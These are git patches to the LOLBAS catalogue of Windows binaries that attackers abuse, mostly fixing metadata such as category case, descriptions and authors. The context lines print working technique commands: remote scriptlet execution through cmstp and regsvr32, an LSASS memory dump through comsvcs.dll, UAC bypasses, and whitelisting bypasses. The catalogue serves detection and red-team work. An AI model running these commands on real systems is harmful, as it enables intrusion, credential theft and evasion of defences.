@@ -14,7 +14,7 @@ Commands: - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Execute code directly from Internet. - Category: AwL bypass + Category: AWL bypass Privileges: User MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 From 09e81d0bd10deddc49da6cda873419ea77704aea Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 22:48:08 -0400 Subject: [PATCH 26/60] Correcting Cmstp.yml Category value, case. --- yml/OSBinaries/Cmstp.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index f4dc7d4..8d51fef 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -14,7 +14,7 @@ Commands: - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Execute code directly from Internet. - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 From 8dd8928a8fdb72fed5118d19911d86b9692369fd Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 22:53:33 -0400 Subject: [PATCH 27/60] Updating gh page workflow and correcting 'AWS bypass' to 'AWS Bypass' --- .github/workflows/gh-pages.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/gh-pages.yml b/.github/workflows/gh-pages.yml index 4e1a7c3..039ba1b 100644 --- a/.github/workflows/gh-pages.yml +++ b/.github/workflows/gh-pages.yml @@ -16,7 +16,7 @@ jobs: - name: Change .yml to .md run: | - for x in $(find yml/ -name '*.yml'); do mv "$x" "${x/%\.yml/.md}"; done + for x in $(find yml/ -name '*.yml'); do echo "---" >> "$x"; mv "$x" "${x/%\.yml/.md}"; done mv yml/OSBinaries yml/Binaries mv yml/OSLibraries yml/Libraries mv yml/OSScripts yml/Scripts From 0ed1694bf1e21459f6f34072e7bb3bfd57a14887 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 22:55:32 -0400 Subject: [PATCH 28/60] Correcting 'AWL bypass' to 'AWL Bypass' --- yml/OSBinaries/Dfsvc.yml | 2 +- yml/OSBinaries/Installutil.yml | 2 +- yml/OSBinaries/Msbuild.yml | 2 +- yml/OSBinaries/Msdt.yml | 2 +- yml/OSBinaries/Regasm.yml | 2 +- yml/OSBinaries/Regsvcs.yml | 2 +- yml/OSBinaries/Regsvr32.yml | 4 ++-- yml/OSLibraries/Dfshim.yml | 2 +- yml/OtherMSBinaries/Msdeploy.yml | 2 +- 9 files changed, 10 insertions(+), 10 deletions(-) diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index 15988e1..2437446 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml @@ -7,7 +7,7 @@ Commands: - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) Usecase: Use binary to bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 57d563b..8514236 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -7,7 +7,7 @@ Commands: - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index 237c6cb..fe273ee 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -7,7 +7,7 @@ Commands: - Command: msbuild.exe pshell.xml Description: Build and execute a C# project stored in the target XML file. Usecase: Compile and run code - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index d8966f0..17d027c 100644 --- a/yml/OSBinaries/Msdt.yml +++ b/yml/OSBinaries/Msdt.yml @@ -14,7 +14,7 @@ Commands: - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Usecase: Execute code bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml index be27c04..ea30825 100644 --- a/yml/OSBinaries/Regasm.yml +++ b/yml/OSBinaries/Regasm.yml @@ -7,7 +7,7 @@ Commands: - Command: regasm.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute code and bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: Local Admin MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index 33cee24..a0600d3 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -14,7 +14,7 @@ Commands: - Command: regsvcs.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: Local Admin MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml index 0056fdb..0a20599 100644 --- a/yml/OSBinaries/Regsvr32.yml +++ b/yml/OSBinaries/Regsvr32.yml @@ -7,14 +7,14 @@ Commands: - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. Usecase: Execute code from remote scriptlet, bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 diff --git a/yml/OSLibraries/Dfshim.yml b/yml/OSLibraries/Dfshim.yml index b48fc42..5d1dfef 100644 --- a/yml/OSLibraries/Dfshim.yml +++ b/yml/OSLibraries/Dfshim.yml @@ -7,7 +7,7 @@ Commands: - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) Usecase: Use binary to bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1127 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 diff --git a/yml/OtherMSBinaries/Msdeploy.yml b/yml/OtherMSBinaries/Msdeploy.yml index 3d285b3..eefd3ab 100644 --- a/yml/OtherMSBinaries/Msdeploy.yml +++ b/yml/OtherMSBinaries/Msdeploy.yml @@ -14,7 +14,7 @@ Commands: - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat" Description: Launch calc.bat via msdeploy.exe. Usecase: Local execution of batch file using msdeploy.exe. - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows server From dd58662ee9fce4748668a26c8483718c62b115f1 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 22:58:06 -0400 Subject: [PATCH 29/60] Correcting 'UAC bypass' to 'UAC Bypass' --- yml/OSBinaries/Eventvwr.yml | 2 +- yml/OSBinaries/Wsreset.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml index f2ca7e4..d5fd50e 100644 --- a/yml/OSBinaries/Eventvwr.yml +++ b/yml/OSBinaries/Eventvwr.yml @@ -7,7 +7,7 @@ Commands: - Command: eventvwr.exe Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. - Category: UAC bypass + Category: UAC Bypass Privileges: User MitreID: T1548.002 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 diff --git a/yml/OSBinaries/Wsreset.yml b/yml/OSBinaries/Wsreset.yml index f854c1c..86522d7 100644 --- a/yml/OSBinaries/Wsreset.yml +++ b/yml/OSBinaries/Wsreset.yml @@ -7,7 +7,7 @@ Commands: - Command: wsreset.exe Description: During startup, wsreset.exe checks the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command for the command to run. Binary will be executed as a high-integrity process without a UAC prompt being displayed to the user. Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. - Category: UAC bypass + Category: UAC Bypass Privileges: User MitreID: T1548.002 OperatingSystem: Windows 10 From abb1034b006af5b9161bdcd78b6e6b191256b01c Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 23:08:46 -0400 Subject: [PATCH 30/60] Added missing description to Extexport.yml --- yml/OSBinaries/Extexport.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index a4a1519..14aef3f 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml @@ -1,6 +1,6 @@ --- Name: Extexport.exe -Description: +Description: Load a DLL located in the c:\test folder with a specific name. Author: 'Oddvar Moe' Created: 2018-05-25 Commands: From d585695b085af52baaa3f09d480133121787cbcb Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 23:26:10 -0400 Subject: [PATCH 31/60] Adding missing Descriptions. --- yml/OSBinaries/Extrac32.yml | 2 +- yml/OSBinaries/Findstr.yml | 2 +- yml/OSBinaries/Ie4uinit.yml | 2 +- yml/OSBinaries/Runonce.yml | 2 +- yml/OSBinaries/Runscripthelper.yml | 2 +- yml/OSBinaries/Scriptrunner.yml | 2 +- yml/OSBinaries/Verclsid.yml | 2 +- yml/OSBinaries/Xwizard.yml | 2 +- yml/OSScripts/CL_mutexverifiers.yml | 2 +- yml/OSScripts/Pubprn.yml | 2 +- 10 files changed, 10 insertions(+), 10 deletions(-) diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index eb682d0..cdd087b 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml @@ -1,6 +1,6 @@ --- Name: Extrac32.exe -Description: +Description: Extract to ADS, copy or overwrite a file with Extrac32.exe Author: 'Oddvar Moe' Created: 2018-05-25 Commands: diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml index f3f67cd..11d1273 100644 --- a/yml/OSBinaries/Findstr.yml +++ b/yml/OSBinaries/Findstr.yml @@ -1,6 +1,6 @@ --- Name: Findstr.exe -Description: +Description: Write to ADS, discover, or download files with Findstr.exe Author: 'Oddvar Moe' Created: 2018-05-25 Commands: diff --git a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml index 931710b..8fbbcc4 100644 --- a/yml/OSBinaries/Ie4uinit.yml +++ b/yml/OSBinaries/Ie4uinit.yml @@ -1,6 +1,6 @@ --- Name: Ie4uinit.exe -Description: +Description: Executes commands from a specially prepared ie4uinit.inf file. Author: 'Oddvar Moe' Created: 2018-05-25 Commands: diff --git a/yml/OSBinaries/Runonce.yml b/yml/OSBinaries/Runonce.yml index e4f94aa..349c645 100644 --- a/yml/OSBinaries/Runonce.yml +++ b/yml/OSBinaries/Runonce.yml @@ -1,6 +1,6 @@ --- Name: Runonce.exe -Description: +Description: Executes a Run Once Task that has been configured in the registry Author: 'Oddvar Moe' Created: 2018-05-25 Commands: diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml index 9dff5c1..198d8e5 100644 --- a/yml/OSBinaries/Runscripthelper.yml +++ b/yml/OSBinaries/Runscripthelper.yml @@ -1,6 +1,6 @@ --- Name: Runscripthelper.exe -Description: +Description: Execute target PowerShell script Author: 'Oddvar Moe' Created: 2018-05-25 Commands: diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml index bf2a128..b27b18b 100644 --- a/yml/OSBinaries/Scriptrunner.yml +++ b/yml/OSBinaries/Scriptrunner.yml @@ -1,6 +1,6 @@ --- Name: Scriptrunner.exe -Description: +Description: Execute binary through proxy binary to evade defensive counter measures Author: 'Oddvar Moe' Created: 2018-05-25 Commands: diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml index 5b4f04c..e78b91b 100644 --- a/yml/OSBinaries/Verclsid.yml +++ b/yml/OSBinaries/Verclsid.yml @@ -1,6 +1,6 @@ --- Name: Verclsid.exe -Description: +Description: Used to verify a COM object before it is instantiated by Windows Explorer Author: '@bohops' Created: 2018-12-04 Commands: diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index 61565c1..831153c 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -1,6 +1,6 @@ --- Name: Xwizard.exe -Description: +Description: Execute custom class that has been added to the registry or download a file with Xwizard.exe Author: 'Oddvar Moe' Created: 2018-05-25 Commands: diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index 22ee4fa..6aa4d87 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -1,6 +1,6 @@ --- Name: CL_Mutexverifiers.ps1 -Description: +Description: Proxy execution with CL_Mutexverifiers.ps1 Author: 'Oddvar Moe' Created: 2018-05-25 Commands: diff --git a/yml/OSScripts/Pubprn.yml b/yml/OSScripts/Pubprn.yml index b86d241..3972a02 100644 --- a/yml/OSScripts/Pubprn.yml +++ b/yml/OSScripts/Pubprn.yml @@ -1,6 +1,6 @@ --- Name: Pubprn.vbs -Description: +Description: Proxy execution with Pubprn.vbs Author: 'Oddvar Moe' Created: 2018-05-25 Commands: From 700d181c7ef973b11b3c2a9bb7297dba81215e71 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 23:30:36 -0400 Subject: [PATCH 32/60] Adding missing OperatingSystem key in Ilasm.yml --- yml/OSBinaries/Ilasm.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSBinaries/Ilasm.yml b/yml/OSBinaries/Ilasm.yml index d7187bd..3132856 100644 --- a/yml/OSBinaries/Ilasm.yml +++ b/yml/OSBinaries/Ilasm.yml @@ -17,6 +17,7 @@ Commands: Category: Compile Privileges: User MitreID: T1127 + OperatingSystem: Windows 10,7 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe From f5baac1c45fa17314c64aa13e1c7c74b29ac24ab Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 23:37:10 -0400 Subject: [PATCH 33/60] Adding missing authors --- yml/OSLibraries/Advpack.yml | 2 +- yml/OSLibraries/Ieadvpack.yml | 2 +- yml/OSLibraries/Ieframe.yml | 2 +- yml/OSLibraries/Mshtml.yml | 2 +- yml/OSLibraries/Pcwutl.yml | 2 +- yml/OSLibraries/Setupapi.yml | 2 +- yml/OSLibraries/Shdocvw.yml | 2 +- yml/OSLibraries/Shell32.yml | 2 +- yml/OSLibraries/Syssetup.yml | 2 +- yml/OSLibraries/Url.yml | 2 +- yml/OSLibraries/Zipfldr.yml | 2 +- yml/OSLibraries/comsvcs.yml | 2 +- 12 files changed, 12 insertions(+), 12 deletions(-) diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index eaae18d..99909eb 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -1,7 +1,7 @@ --- Name: Advpack.dll Description: Utility for installing software and drivers with rundll32.exe -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index 2a08d33..9af9e84 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -1,7 +1,7 @@ --- Name: Ieadvpack.dll Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll. -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 348928d..73f8ee8 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -1,7 +1,7 @@ --- Name: Ieframe.dll Description: Internet Browser DLL for translating HTML code. -Author: +Author: LOLBAS Team Created: '2018-05-25' Commands: - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml index 73f3388..b3a777f 100644 --- a/yml/OSLibraries/Mshtml.yml +++ b/yml/OSLibraries/Mshtml.yml @@ -1,7 +1,7 @@ --- Name: Mshtml.dll Description: Microsoft HTML Viewer -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml index 0a3def5..3520e26 100644 --- a/yml/OSLibraries/Pcwutl.yml +++ b/yml/OSLibraries/Pcwutl.yml @@ -1,7 +1,7 @@ --- Name: Pcwutl.dll Description: Microsoft HTML Viewer -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index adf27be..bd9d3a8 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -1,7 +1,7 @@ --- Name: Setupapi.dll Description: Windows Setup Application Programming Interface -Author: +Author: LOLBAS Team Created: '2018-05-25' Commands: - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index c3f5bd8..82cc9d0 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -1,7 +1,7 @@ --- Name: Shdocvw.dll Description: Shell Doc Object and Control Library. -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index ea8e116..0afce49 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml @@ -1,7 +1,7 @@ --- Name: Shell32.dll Description: Windows Shell Common Dll -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml index ad673b2..a9792f2 100644 --- a/yml/OSLibraries/Syssetup.yml +++ b/yml/OSLibraries/Syssetup.yml @@ -1,7 +1,7 @@ --- Name: Syssetup.dll Description: Windows NT System Setup -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index 0de5892..a1d0a80 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml @@ -1,7 +1,7 @@ --- Name: Url.dll Description: Internet Shortcut Shell Extension DLL. -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta" diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml index 129fad6..0630f1c 100644 --- a/yml/OSLibraries/Zipfldr.yml +++ b/yml/OSLibraries/Zipfldr.yml @@ -1,7 +1,7 @@ --- Name: Zipfldr.dll Description: Compressed Folder library -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe diff --git a/yml/OSLibraries/comsvcs.yml b/yml/OSLibraries/comsvcs.yml index 500214b..4eb5b2a 100644 --- a/yml/OSLibraries/comsvcs.yml +++ b/yml/OSLibraries/comsvcs.yml @@ -1,7 +1,7 @@ --- Name: Comsvcs.dll Description: COM+ Services -Author: +Author: LOLBAS Team Created: 2019-08-30 Commands: - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full" From a040ca3e4040da39bb7555274bb1a1aceb050bd5 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 23:41:38 -0400 Subject: [PATCH 34/60] Adding missing OperatingSystem values to Ieadvpack.yml --- yml/OSLibraries/Ieadvpack.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index 9af9e84..0dcc668 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -31,12 +31,14 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows Full_Path: - Path: c:\windows\system32\ieadvpack.dll - Path: c:\windows\syswow64\ieadvpack.dll From 371d1cf2cc91f2b2ac7d7c2b961d8c82e72a751e Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 23:45:28 -0400 Subject: [PATCH 35/60] Correcting case in Usecase key names. --- yml/OSLibraries/Ieframe.yml | 2 +- yml/OSLibraries/Setupapi.yml | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 73f8ee8..2423263 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -6,7 +6,7 @@ Created: '2018-05-25' Commands: - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. + Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. Category: Execute Privileges: User MitreID: T1218.011 diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index bd9d3a8..401c27b 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -6,14 +6,14 @@ Created: '2018-05-25' Commands: - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification. + Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1218.011 OperatingSystem: Windows - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. - UseCase: Load an executable payload. + Usecase: Load an executable payload. Category: Execute Privileges: User MitreID: T1218.011 From c24cad786866a28dc545a5d31de73c82c1b89392 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 23:48:38 -0400 Subject: [PATCH 36/60] Adding missing OperatingSystem values. --- yml/OSLibraries/Shell32.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index 0afce49..302ded6 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml @@ -17,12 +17,14 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" Description: Launch command line by calling the ShellExec_RunDLL function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows Full_Path: - Path: c:\windows\system32\shell32.dll - Path: c:\windows\syswow64\shell32.dll From 1bd305e3a3f817756b06060c3809bca94b00d87c Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 23:53:21 -0400 Subject: [PATCH 37/60] Adding missing Usecase values. --- yml/OtherMSBinaries/Dotnet.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml index 107fd5e..b202817 100644 --- a/yml/OtherMSBinaries/Dotnet.yml +++ b/yml/OtherMSBinaries/Dotnet.yml @@ -6,6 +6,7 @@ Created: 2019-11-12 Commands: - Command: dotnet.exe [PATH_TO_DLL] Description: dotnet.exe will execute any dll even if applocker is enabled. + Usecase: Execute code bypassing AWL Category: AWL Bypass Privileges: User MitreID: T1218 @@ -19,6 +20,7 @@ Commands: OperatingSystem: Windows 7 and up with .NET installed - Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ] Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code + Usecase: Execute code bypassing AWL Category: AWL Bypass Privileges: User MitreID: T1218 From c933426c1ac71ed5cabfdb8a22391e5bbe77edd8 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 00:03:30 -0400 Subject: [PATCH 38/60] Adding missing Path value. --- yml/OtherMSBinaries/Msxsl.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/Msxsl.yml b/yml/OtherMSBinaries/Msxsl.yml index 77a3a18..b7a2cb3 100644 --- a/yml/OtherMSBinaries/Msxsl.yml +++ b/yml/OtherMSBinaries/Msxsl.yml @@ -33,7 +33,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Full_Path: - - Path: + - Path: no default Code_Sample: - Code: Detection: From aa1e1ea2be2db2773cc0e8d6f44f4695ec54b4cb Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 00:16:59 -0400 Subject: [PATCH 39/60] Adding no defualt paths to pass schema validations --- yml/OtherMSBinaries/Procdump.yml | 2 ++ yml/OtherMSBinaries/Rcsi.yml | 2 +- yml/OtherMSBinaries/Te.yml | 2 +- yml/OtherMSBinaries/Tracker.yml | 2 +- 4 files changed, 5 insertions(+), 3 deletions(-) diff --git a/yml/OtherMSBinaries/Procdump.yml b/yml/OtherMSBinaries/Procdump.yml index 546371f..fda943a 100644 --- a/yml/OtherMSBinaries/Procdump.yml +++ b/yml/OtherMSBinaries/Procdump.yml @@ -18,6 +18,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. +Full_Path: + - Path: no default Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_susp_procdump.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_procdump.yml diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml index e15b4c9..0ef6457 100644 --- a/yml/OtherMSBinaries/Rcsi.yml +++ b/yml/OtherMSBinaries/Rcsi.yml @@ -19,7 +19,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 